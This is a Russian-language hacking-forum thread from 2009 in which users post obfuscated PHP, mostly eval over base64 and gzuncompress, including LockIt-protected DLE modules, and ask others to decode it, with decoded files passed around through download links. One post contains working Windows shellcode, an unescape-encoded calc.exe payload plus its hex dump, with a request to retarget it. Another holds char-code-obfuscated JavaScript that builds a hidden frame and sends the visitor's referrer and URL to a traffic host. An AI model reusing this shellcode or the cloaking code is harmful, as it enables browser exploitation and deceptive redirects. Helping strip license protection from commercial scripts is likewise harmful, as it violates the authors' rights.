iULBrAQgEwzAEvw0Cv9QEvDIEvwS+CWsfWSbUCjESgw/gKA8HIGFQYW7QAH4gB6FmZ8JFTkdJTkVfRElSLicDvC9kYXRhL wUJfeJMYHcTVWH2BHMBsDw/AABQSFAgXG5cbi8vU3lzdGVtZWEgc/AoEHVyeqJzAbFcMToJ8GFycmGJcNMAAcEFtm8TgGNoT+UmwyBh cyAkbmFtABllID0+ICR2YWx1ZWcgCG8newJiIhx9JwKBXCJ7Ar N9XCIsBjU+owOvKTufWAIhPz4IdmjVDiMT2iAfaSATMxtvG2hk ZWYO82F1bHQkvxCQJL00BK8EogvzKJBAaHaQYsCgRpHMdJmAL2 NzczsgPgQ9Ii4/PwzjZQz4Y2hvICzkBdJkaacQAcIGdG++dFBpX24NcHVsbCBOMK bjIFGFZH5ACZAAMSRkYi1AFD6GIigiVVBEQVRFIIdRVXAQUFII gUVGSViJACJfdZigcyBTRVQgAKECA19ncm91cBCwNSBXSEVSRQ FbOvmRoA+lTG+gUzogLxtjC2Rmr4V2ZXJpZgreeWluZz2waHoD MD3RjjIkk3IBdGQxAQFzDABpemUoMMowci9zb3VyY2VzL2MGPm 9tcG9uo8AAs2lsZTGyZghgowTBgTMh/+BgkQZhB5FFZEvUFNY5tAvxAEEUIAw2YWRtaW7nyhbfHTRd0W9 yh+AyYwDxSSAAcG9wseFzAKBsORxfZhrwHfIFgCAkpZBvcl80s 8TyAbZyZQAfcXVpcmVfb25jZSAQSkEPvuoDn0SVoGMT02xlwHV hZ2UvJyi3AUFzJ11G0A4iD5YubG5npKAKIQBAdNh4ligpPxAkD OMiUGZ/62Gq8HP4AafSMQGRBIAAMQnfCdsH8i8XBXMc8hE/4dYRPg2jA9N0YWJsIIMDnwOfbxsALwOTBFBt8b8HHxhPWUECwH VtL99SKIFhEZADtiNQADBdYF0wg0jg6T0gbmV34jwKMiQCmy0+ MqYoJzMAADM3Y2Q3M2EzMTQ2NGRkNGEAA2RmYzNjNWRiYzM1Nm NklNAEMoAeGkJfUkVRVUVTVFsnCfJwQeexijAnw/6FcN2AeWVzIi+QNxEYnxiVJf8l+AN/A3UHMi9d2Gwl3ycBQSXfIOEgD657cAs0KDRQEIB0X3UnA25p5H EoJA39dGCK5iAgZXhpdBCwF6IAAD8+"));
?>

0ldbi4

26.11.2009, 00:03

Каким образом обфусцировать код на AS, желатьтельно онлайн обфускатор нехочется самомому переводить.

GenTao

28.11.2009, 05:58

oneline

28.11.2009, 09:21

помогите расшифровать )

<?php
$V254778035="5rautq+ooKnu7/3m";eval(base64_decode("ZXZhbChiYXNlNjRfZGVjb2RlKCJaWFpoYkNoaVlYTmxOalJmWk dWamIyUmxLQ0pLUmxsNlRrUlZNMDU2UlRCT2VrazVXVzFHZWxw VVdUQllNbEpzV1RJNWExcFRaMmxYVnpGSFpXeHdWVmRVUWxsTm JFcHpWMVJKTldFeGNGSlFWREJwUzFSemExWnFVWGhOVkZWNVRs UlJkMDVFTVdsWldFNXNUbXBTWmxwSFZtcGlNbEpzUzBOS2FrMH hTalZaYTJSWFpGTkpjRTk1VWxkT2VrazBUbnBuZWs1cVZUUlFW MHBvWXpKVk1rNUdPV3RhVjA1MldrZFZiMGxzYTNsaFNHdHBTMV J6YTFacVozaE5SRlYzVFVSamVFNXFNV2xaV0U1c1RtcFNabHBI Vm1waU1sSnNTME5LYVUwd2NISkphV3MzU2taWk5VNUVTVEJPZW xFd1RsUm5PVmx0Um5wYVZGa3dXREpTYkZreU9XdGFVMmRwVjJw T2QyTkhTblJYYms1YVYwWktjMGxwYXpjaUtTazdaWFpoYkNoaV lYTmxOalJmWkdWamIyUmxLQ0pLUmxsNVRsUlJNMDU2WjNkTmVs VTVTa1paZWs1RVZUTk9la1V3VG5wSmIwcEdXWGxPVkZFelRucG 5kMDE2VlhCUGVWSlhUbFJyTWs1NmF6UlBWRkY1VUZOU1YwNUVS WGhPVkVreFRrUkJNRXREVWxkTmFsVXdUbnBqTkUxRVRURkxWSE 05SWlrcE93PT0iKSk7ZXZhbChiYXNlNjRfZGVjb2RlKCJKRll4 TkRRek16STVOelU5SnljN1ptOXlLQ1JXTmpBME9UWXpPRFl6UF RBN0pGWTJNRFE1TmpNNE5qTThKRlkxT1RZM09UZzVOREk3SkZZ Mk1EUTVOak00TmpNckt5bDdKRll4TkRRek16STVOelV1UFNSV0 56STROemd6TmpVNEtDZ2tWamd4TURVd01EY3hOaWdrVmpJMU5E YzNPREF6TlZza1ZqWXdORGsyTXpnMk0xMHBYakUwTkRrME9UZz FOallwS1R0OVpYWmhiQ2drVmpFME5ETXpNamszTlNrNyIpKTs="));
?>

Kaimi

28.11.2009, 13:34

<?php
phpinfo();
?>

anticoder

28.11.2009, 15:48

нужна помощь в расшифровке, помогите кто может.

есть код типа:

//------------------Replace with your code-----------------------//
var Shellcode = unescape("%uE8FC%u0044%u0000%u458B%u8B3C%u057C%u0178%u8BEF%u 184F%u5F8B%u0120%u49EB%u348B%u018B%u31EE%u99C0%u84 AC%u74C0%uC107%u0DCA%uC201%uF4EB%u543B%u0424%uE575 %u5F8B%u0124%u66EB%u0C8B%u8B4B%u1C5F%uEB01%u1C8B%u 018B%u89EB%u245C%uC304%uC031%u8B64%u3040%uC085%u0C 78%u408B%u8B0C%u1C70%u8BAD%u0868%u09EB%u808B%u00B0 %u0000%u688B%u5F3C%uF631%u5660%uF889%uC083%u507B%u 7E68%uE2D8%u6873%uFE98%u0E8A%uFF57%u63E7%u6C61%u00 63");
//------------------Replace with your code-----------------------//

пытаюсь вывести на экран document.write (), но получаю иероглифы.

нашел конвертер UCS2 to HEX, результат радужнее предыдущего:

FCE8 4400 0000 8B45 3C8B 7C05 7801 EF8B 4F18 8B5F 2001 EB49 8B34 8B01 EE31 C099 AC84 C074 07C1 CA0D 01C2 EBF4 3B54 2404 75E5 8B5F 2401 EB66 8B0C 4B8B 5F1C 01EB 8B1C 8B01 EB89 5C24 04C3 31C0 648B 4030 85C0 780C 8B40 0C8B 701C AD8B 6808 EB09 8B80 B000 0000 8B68 3C5F 31F6 6056 89F8 83C0 7B50 687E D8E2 7368 98FE 8A0E 57FF E763 616C 6300

но хотелось бы привести к более читаемому результату. Объясните пожалуйста как это сделать!
Заранее благодарю!)

ps вообще, объясните, что делает данный код? то что он запускает calc.exe, я знаю. хочу знать как он это делает и как можно его изменить чтоб, например, он запускал блокнот))

mr.The

28.11.2009, 17:31

anticoder, имя переменной "Shellcode" кагбэ намекает, что там записан байт-код, который исполняется уязвимым браузером при переполнении буффера. Так что твой HEX код ты можешь записать файл и открыть в любом дизасемблере.

а вот тебе немного шеллкодов: http://www.shell-storm.org/shellcode/

Wanderercom

29.11.2009, 04:48

Kaimi
Расшифруй, пожалуйста, файлы http://rapidshare.com/files/313611288/upload.rar.html

Nightmarе

29.11.2009, 05:02

Кто нибудь сможет расшифровать перловый скрипт гостевой книги Mbook ???
Может найдётся какой нибудть уневерсальный дешифратор пэрлового кода всех этих скриптов, очень давно ищю.

Кто поможет, буду очень благодарен.

PS: вот скрипты гостевухи:
http://www.sendspace.com/file/13flo4

Dragon_X

30.11.2009, 13:47

Kaimi
Расшифруй, пожалуйста, файлы http://rapidshare.com/files/313611288/upload.rar.html

Держи
upload_new.rar
http://www.sendspace.com/file/twf2c6

Dragon_X

30.11.2009, 15:46

кому что ещё надо? пишите

Nightmarе

30.11.2009, 15:50

кому что ещё надо? пишите
Кто нибудь сможет расшифровать перловый скрипт гостевой книги Mbook ???
Может найдётся какой нибудть уневерсальный дешифратор пэрлового кода всех этих скриптов, очень давно ищю.

Кто поможет, буду очень благодарен.

PS: вот скрипты гостевухи:
http://www.sendspace.com/file/13flo4

если конечно возможно.

Wanderercom

30.11.2009, 21:44

Dragon_X
Спасибо!!!!!

anticoder

30.11.2009, 22:33

azote

01.12.2009, 19:42

Нужна помощь.
<?php
$OOO0O0O00=__FILE__;$O00O00O00=__LINE__;$OO00O0000 =1888;eval(gzuncompress(base64_decode('eNplj1ePgkA AhP8MCbsR44KIEMKDvbv29nKhLEVp7lKUX3+au9xdcpl5msx8y XAYIYRfQoabpCQGHMb4KxB4avFQL/0gJKBe5/C7+DZ0PZIxwP1MBRFJMtT/xTLSFKi/iN9Lw6vy2E6ilBLGgGUyosgfDrEThwCW0YwClxLT+YtQVBUK/NMxw02uHR6n7EjZsCVVuLfrNKfz+zK9TNx+e+/HdoNsB0lUzM6jWxetFFG21kGpjmsL72rwAt/p9vqD4Wg8mc7miyVerTfb3f5wPJ0vpmU7xPX84HoLozhJ75Rle VE+nhUSpabcUtqqVmvwEEKdFGYIfg9B/RPjTF8q')));return;?>
fsmsTAYCbcyTjhKvBH7pqqtEhuvRleE2/XGyfF4c2SxamPRXG0Yy0ojJV+XleConKfdlJbeBY53UrQAbMg9 ZjOwSkcsYKe2VvheEwgv2o40B7oGlKFF4D2NZL1ePtddZNBRmq +YEisy9NSY3iyahVlVEdXOdULOV3Fyh12mpQ9CTu6xmFbdB2dB yHNqzYmX/To93R5iVzfS4fvWD+eTJUsxbQrdBuVyAdvL+swUjzDpflI4A1S YLO/tpRRxwd19hbAmYvuf4O/bv85A1oJmsu1T0JIlBX1/NJhqWBtdXaOqRJvezoLg9tbhlhUGqdztFjAMafSniiHZyJGsJA vqTvpQ5wsg+zfNDUg50ZxNfVSgr0/+Dqb7PSV8D5RMDXK50p52PSNRkCguHjnLNlMuasw2scih3Omv8 f/s6fwbdH0UemtnveA0f1QTZhgaxVrXt8kPEZ/n9Qm8IsrWsXft8dNqSyf9aaTqKdEquEhVguPkbb1IAozhgYBPS RG6Tg0DhS5Vrwkm7IudWp06SF1JjteZDpob4JuFdmGN4GPfJzQ DHNne0uegZ1YwbIvJ2kRQU9RHkV00meNsKHk7cJPh3PmfANGbK DSw0f3T1CykKqEkfQn/Y4jrHnxG7bgkDlMO4MLQiqeXvfbIABD5Kcvpofd6flaE/E3Kiw9+KTkxSF5Z9ay==fsmMA4Y591ZTDvL/jifC4TmWRIhc8TGUEuXLRcYZTUkTAoN4WsH0foOMFlYnRoCPHj vNYjBya1VnZVuET8et+YafeIeWpTBOVaAg7s1wqHH6SZGZFAkx/bZWgfAoDEJ+4Ki8NdkTxBBFOBMtl6zEUz9KbM6foa1aqGlO7ry +Vd0dWpaDcRtg9QeBl9QFFik/KS+TURgEJ3WIZhu5DXY8mRkIP5LlBSMB0Tto9DmujrkdMIYWfl ri5CbHjkF+lwfl1HZJjPTB6lw1EHlptTTaq1oJpeRIYk7bfZq7 h6nTUEDaCaRj5+15CZz+VLjrdBhmgRiWYUqbnhWmYnSrsxkB6Z WaYQ5iwHYptR+p/IMHA4DkJ+5widzfMIH4Qw4I2fjcH+V4JgDMP68+Gf8IMaHHT+F jHWbg3xO3taavqzg9Rf3R/CvY835+zgjAAfjDK8kgbOtZklMdbkg7nZRXMugUygZJkI5dgIz 1q6uIYyT6M+yUWNBzdbpy3ujIJIbKpXneMK5tYe/yKAnxw00tTtLMKoY5NFaa6CS0FjPfdK3/2nid1Oe6ksd4hOFbgrBMaXjnWYb6ZTkIKlQ5x/ucQCZNZgchzccKUoVzOWaaoYI4K9P/D3GMTETO99TVPH/Kit5GU1HJabPDhV3v92LY8EEL9PcAPUnUBvXAsJjNrbGHNr7XH ONSLOlKaVo8KElVIHxfBU95cCuICqseI52eD9pqnErrDX+RV9T pmwK4ZPcAYvvErfsUIVzCueMhsPAIzhxNYrxUhDXmhyJO2rYNR AixLT8SlevC7djNSSCHEO/ZETiZ4XBG2wP06gcfqLx0fIH02cDeIcHlv5nR5PazUJ7PsNmyp 1LMCALFgPF0ebbqq7uorMy0AO2yOO8JT+6/aYx3CFQyRDMuRSXl6ld2VZRGIPPdwCi/kXIx181t3/eKs1lhWKe//W2xhljmSuO5fOk+CQIJUuPWtNfN+maS4mJMFPla9uyaiz6rv66 YRmBNXWHQ9rgnaDKNHYmveIJVAJFn+7GgNWX2blHTrsDHtqxbp cvpz1k9eaclDSwcAUu3LadqmDrhx4g540kVzSWRAAmFXw3h2H0 5Wc3UZoZLrzwqRf/iIn5FE4an6U0ei+H/gne3UA+/ATIDQjXSbq2XgDOMZL8gOdReUtLEkg5KeceHfws0FgX0FiMD/eRUNwUmCJ3WCauweEDHO0ruKj7cp03r/qUvvtyvhrSLwVOoLH3h1rgbWrTRIzBVvLHYRh/trrOLqWAlS47E0G0759iX/poNoGjsPzSH3uZ3HZltGmIeOdotEPzfTiIhWGFYssbkHs4KhIm rUX28hunTUvxPR/K3zSPikMih0h8lHyCtdy6jxPdgUvXG4Yq9pkypBCpelVz2AmaZ BmRgRk/rLl2NNmEz4HSs3Cpdaxql853uUv6lZRS4PIPEl1vAHQmZahlhi Kz7sXXWCY0+aTKYRTsRJt2rzvbgg54hEP9nSOJXgRQirROUtXF yPhGEprlmsSHSPWK30xn62TGApq70zGR4nXRbBLdzVRt3o0NOa 3ERf87LHUUS4oNqWsiampFSFVRzn6C/LKQZssIb+C0kAVfbA5KNN/Qq1pFZy18wuQZm4qYfq5nVOx79iMZ4HuCJ6Ov+gaYxEx//hQhCo582fWFPAIes/ACHtOJJSlO6/GwKiDfn9cG/e+bB9B0HGpN6YH1Hr4KTU4QXkECJEMrk67aV0dxgxqVI8oiNAh 5PYRKnWXO0RAwNXNBK7ZmLPeZ/1TDcm067h0FNU5mLckphRQ8RWxv0xZtvRm/9EYV0nnfjRU990BhQiJwKq/0+NeU4ju6dphneHZ0HFHeN/k9tOZHNWznhCeiWDPJFdiQoeObeveR+a5+lS2QBSB==

Kaimi

01.12.2009, 20:18

azote

01.12.2009, 20:20

Kaimi Спасибо. Как так получить декод? Провозился 2 часа... так ничего и неполучил. :(

Dragon_X

02.12.2009, 09:31

Kaimi Спасибо. Как так получить декод? Провозился 2 часа... так ничего и неполучил. :(

Алгоритм шифровки: LockIt
У него видимо распакованный код этого мода для DLE есть, ибо в зашифрованном файле комментариев нет.

azote

02.12.2009, 14:25

Алгоритм шифровки: LockIt
У него видимо распакованный код этого мода для DLE есть, ибо в зашифрованном файле комментариев нет.
Спасибо за ифнормацию. А паблик декодеры LockIt есть?

PetROM

04.12.2009, 02:51

Кто может подсказать, как из кода:

<frameset frameborder=0 framespacing=0 border=0 rows="100%,*" noresize><frame name="sor" src="http://liveinternet.ru/click?asl32urfin589aknod.ru/in.cgi?11&seoref="+encodeURIComponent(document.ref errer)+ "&parameter=$keyword&se=$se&ur=1&HTTP_REFERER="+en codeURIComponent(document.URL)+"&default_keyword=з накомства" noresize></frameset>

делают:

function Decode(){var temp="",i,c=0,out="";var str="60!102!114!97!109!101!115!101!116!32!102!114!97!10 9!101!98!111!114!100!101!114!61!48!32!102!114!97!1 09!101!115!112!97!99!105!110!103!61!48!32!98!111!1 14!100!101!114!61!48!32!114!111!119!115!61!34!49!4 8!48!37!44!42!34!32!110!111!114!101!115!105!122!10 1!62!60!102!114!97!109!101!32!110!97!109!101!61!34 !115!111!114!34!32!115!114!99!61!34!104!116!116!11 2!58!47!47!108!105!118!101!105!110!116!101!114!110 !101!116!46!114!117!47!99!108!105!99!107!63!97!115 !108!51!50!117!114!102!105!110!53!56!57!97!107!110 !111!100!46!114!117!47!105!110!46!99!103!105!63!49 !49!38!115!101!111!114!101!102!61!34!43!101!110!99 !111!100!101!85!82!73!67!111!109!112!111!110!101!1 10!116!40!100!111!99!117!109!101!110!116!46!114!10 1!102!101!114!114!101!114!41!43!32!34!38!112!97!11 4!97!109!101!116!101!114!61!36!107!101!121!119!111 !114!100!38!115!101!61!36!115!101!38!117!114!61!49 !38!72!84!84!80!95!82!69!70!69!82!69!82!61!34!43!1 01!110!99!111!100!101!85!82!73!67!111!109!112!111! 110!101!110!116!40!100!111!99!117!109!101!110!116! 46!85!82!76!41!43!34!38!100!101!102!97!117!108!116 !95!107!101!121!119!111!114!100!61!1079!1085!1072! 1082!1086!1084!1089!1090!1074!1072!34!32!110!111!1 14!101!115!105!122!101!62!60!47!102!114!97!109!101 !115!101!116!62!";l=str.length;while(c<=str.length-1){while(str.charAt(c)!='!')temp=temp+str.charAt(c ++);c++;out=out+String.fromCharCode(temp);temp="";}document.write(out);}
Decode();

Pashkela

04.12.2009, 02:56

хм, вопрос забавный, вспомнил "Верный вопрос" Р. ШЕКЛИ

m0Hze

04.12.2009, 02:59

PetROM

04.12.2009, 03:10

Каждый символ кода переводиться в chr(); и ставить разделитель,в данном случае это - !.Затем,с помощью цикла,закодированный скрипт разделаеться по разделителю (!) и переводиться в символ сопоставленый с этой цмфрой.Далее полученная переменная просто передаеться на страницу методом записи(читай выполняеться) и мы видим готовый код.Вот и все.Алгоритм достаточно простой.

Спс большое. Но я к сожалению слабоват в кодинге. На досуге конечно и сам поупражняюсь (здесь по ходу требуется не больше 10 строчек кода), но сейчас остро нуждаюсь в дейсвующем (готовом) решении.
Если у кого есть - по делитесь плз..

Wakko

08.12.2009, 18:43

помогите

<?php // This file is protected by copyright law and provided under license. Reverse engineering of this file is strictly prohibited.
$OOO0O0O00=__FILE__;$O00O00O00=__LINE__;$OO00O0000 =2904;eval(gzuncompress(base64_decode('eNplj1ePgkA AhP8MCbsR44KIEMKDvbv29nKhLEVp7lKUX3+au9xdcpl5msx8y XAYIYRfQoabpCQGHMb4KxB4avFQL/0gJKBe5/C7+DZ0PZIxwP1MBRFJMtT/xTLSFKi/iN9Lw6vy2E6ilBLGgGUyosgfDrEThwCW0YwClxLT+YtQVBUK/AU9H3IkYlMLJotO2T+TqraeZ7fT0hsovro/MCvuTlsNOx/TVRrOku396Azddk8qrqPmbmPwAt/p9vqD4Wg8mc7miyVerTfb3f5wPJ0vpmU7xPX84HoLozhJ75Rle VE+nhUSpabcUtqqVmvwEEKdFGYIfg9B/RPMh18q')));return;?>
8AHAQLp+fBZQRbProjVENNicbmr4x5cYJ9lZ8wFBY/ayHq49lSpZSuRkOG9x5+unP80xkf5opDtsM7Lf3T16Rz2/KBApP5YOrb5c2TrYuFSoVulxPwwFUYg6Xd5qi006go4HNGpcCA Z1g/ptCZybOxOc09z0sXzOtwZbdYHE71+QmWaHwf0oY0oZjgNepH9J Qu1t4DCOe8/F8rIUG5QksAaf7M0omOZL0rXGA2sReUE8xhFLd/pXzJiE44a20d1bfLHprm8FzJfrvDLdukHAmdQSkhxo9dJgkbNI oi09yzN4kr5euXT1ifbxbslN0eiwRL3y8/nCCj6ZklAkLrNQrE7D2ATGe8gUsTDS6ag8O/TMSJGUNfVq/OvUD43U9PDSEDYq/g4K+TmjRnXgx3myA2YABCbtzHrv8JAW82f0jSs5Hinr5LS8d7Q 6bTyaOM9ivKqc6Jn17HvhAMIA98iv0gN/Z81yyQNP0cNmcbOTmqKffdhLuebTQlRjGUNgqhbslQivh7V9V3 k+KIbjixgFe1KjrMCEjKjSu5a1tLEf/ewKfn57MKEtokr735bnLB/s14jKOSSH5gAPjKVBkqbtqH8LglfPU/2S8tQd+ZKPNcK87nJpFRMjnalVfTKUx3zF3X7CN59r8fhLoUDP BrEu80W8xycJctPC21GPQKa/ana1yZ==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

Kaimi

08.12.2009, 19:27

помогите

slil.ru/28313322

Wakko

08.12.2009, 19:32

Kaimi, благодорю.

Wakko

10.12.2009, 03:27

Пожалуйста декодируйте

<?php // This file is protected by copyright law and provided under license. Reverse engineering of this file is strictly prohibited.
$OOO0O0O00=__FILE__;$O00O00O00=__LINE__;$OO00O0000 =3440;eval(gzuncompress(base64_decode('eNplj1ePgkA AhP8MCbsR44KIEMKDvbv29nKhLEVp7lKUX3+au9xdcpl5msx8y XAYIYRfQoabpCQGHMb4KxB4avFQL/0gJKBe5/C7+DZ0PZIxwP1MBRFJMtT/xTLSFKi/iN9Lw6vy2E6ilBLGgGUyosgfDrEThwCW0YwClxLT+YtQVBUK/AU9H3IkYlMLJotO2T+TqraeZ7fT0hsovro/MCvuTlsNOx/TVRrOku396Azddk8qrqPmbmPwAt/p9vqD4Wg8mc7miyVerTfb3f5wPJ0vpmU7xPX84HoLozhJ75Rle VE+nhUSpabcUtqqVmvwEEKdFGYIfg9B/RPMh18q')));return;?>
8AHAQLp+fBZQRbProjVENNicbmr4x5cYJ9lZ8wFBY/ayHq49lSpZSuRkOG9x5+unP80xkf5opDtsM7Lf3T16Rz2/KBApP5YOrb5c2TrYuFSoVulxPwwFUYg6Xd5qi006go4HNGpcCA Z1g/ptCZybOxOc09z0sXzOtwZbdYHE71+QmWaHwf0oY0oZjgNepH9J Qu1t4DCOe8/F8rIUG5QksAaf7M0omOZL0rXGA2sReUE8xhFLd/pXzJiE44a20d1bfLHprm8FzJfrvDLdukHAmdQSkhxo9dJgkbNI oi09yzN4kr5euXT1ifbxbslN0eiwRL3y8/nCCj6ZklAkLrNQrE7D2ATGe8gUsTDS6ag8O/TMSJGUNfVq/OvUD43U9PDSEDYq/g4K+TmjRnXgx3myA2YABCbtzHrv8JAW82f0jSs5Hinr5LS8d7Q 6bTyaOM9ivKqc6Jn17HvhAMIA98iv0gN/Z81yyQNP0cNmcbOTmqKffdhLuebTQlRjGUNgqhbslQivh7V9V3 k+KIbjixgFe1KjrMCEjKjSu5a1tLEf/ewKfn57MKEtokr735bnLB/s14jKOSSH5gAPjKVBkqbtqH8LglfPU/2S8tQd+ZKPNcK87nJpFRMjnalVfTKUx3zF3X7CN59r8fhLoUDP BrEu80W8xycJctPC21GPQKa/ana1yZ==8Arht5pKfdXtReo0RVG7sZ09VzQ2nqaIwQBEwO9PaI XxtT7labvXB+bz1DALBrip1K2We+TflFbVDd0SrZdnzjYBAfbj qtjfxsGzgNlqaWDjH0OX5s/w5kKDKkDlx9tNeD21CKCdDC5LpQUZIXczAtZjhWp7BCwHHPMnX ua/XuLyQg59ycQPJ9locNZp55nc4pqOl5JHskS8EbrHJBsqebwUcx ae9kSzrwJ4LHn2eXFF2yHH/Dn9ju3dChVTD1W7R3vSc1PU/sS3G4mfh/NqLL/y2kaCI+TJaT8ErmEALEunoZcLeZiDhEts9EI+RyYGXot9NsL4W w/cG/eayvrtFMLg7Xed9Yw72lElWwiKD2SKjOeBUARH3hv3VX23yi3E KF5RpkKYwsngRQOOvJuo71GhpIrtJAVRphC6mgxiQbg/Fg8JGGUtvFjrJ7EDgsUVl76Og1brR3XvgMODy1GU+1/EnUSMYHSyTncapauNa4ZgQcG8JsCTtLCPmJ6UIvGtQ2x9oA2MC ucVQsWJJBsJzFeHY4q+quu2/XDMR4SbUqgez0Hbz+OkwgiXXJBdM8Y6xlkWWPZpAb9rp7hmjaU Zo1FKayP7K5FlBUyPwfqoral5YuKUHVrm/6DA92iboDuKWp70sJsA1vglHYEjXvHzlBDFh9IUii2RLLSRJJc HJNjqzfPEuh+k5LJoYxwZKPDboq6ESYSEye1lZV4DLSR0SoI6y bIGEFVSm6Ip7vMUQqO6y+1ef4PBrlmDdHzj9bXrccVgE2igB8E TgsT3UfdUpaEpcR8oq8Fswl3K6ux867xfM30r3Q3TpX211pef9 YVrVnlSN7fZYghKOYRpIJnYEj7lpVhx/A0TN8ABfxKkQmqxqGqjLr/m0RUYf8rxlXTazBLHy9ekJYrty46iT4UIvjJQKbaeov017u7Z1 BWkQsvq0Cqgxvn3KAAM9qlHQsLrPFZJBB4WVQ8WxvHvinAImr1 wrnesJeLat1O+A5bJVLPUqSILpdQdCF2Lhlu/qACOkZnwL0OM36RpWTU0UK5DxohO+xWsZZkTJXfifQmzr6OjIr Igvr8vjt4UmuBJtEyOtZs8f+BkpQv9YOkxPexOydnlfwj3+gtB nrpMm+Pf1lQkp1atZD25xXNpkMZTpVRgtmMogrXEtRSPngIjJV QkXA0vMWoElKkbX/13lMvbuRbwTbEJdyXPCjYZOweZo4RuFZpXsxRxQBmMNQElRTL/l3G3TpxlYJJpiZIe5dCvccs/X+xPf2f+IiEYXUKaXs/ur5mYt8eFcnysJXkDdHXcd7e5mxJPGzMoAywE7epDf635dLeR3 8RpJvdxNRkwbDP+/RlshYWOjkjj4Awj7k77mV2N9k2jFP3ANtL2uNn3yplbHs+VN5C wyY47zAqyHusQMEwJucNPqZ79mxtb57JN7ikyUwx04YD7fECIl 61feqb+f13TOOjU/D/WO0KX3BPtCkTAmST+EQt2w8pxpNZN+0k62pEZEs3gDXXvEO61Y 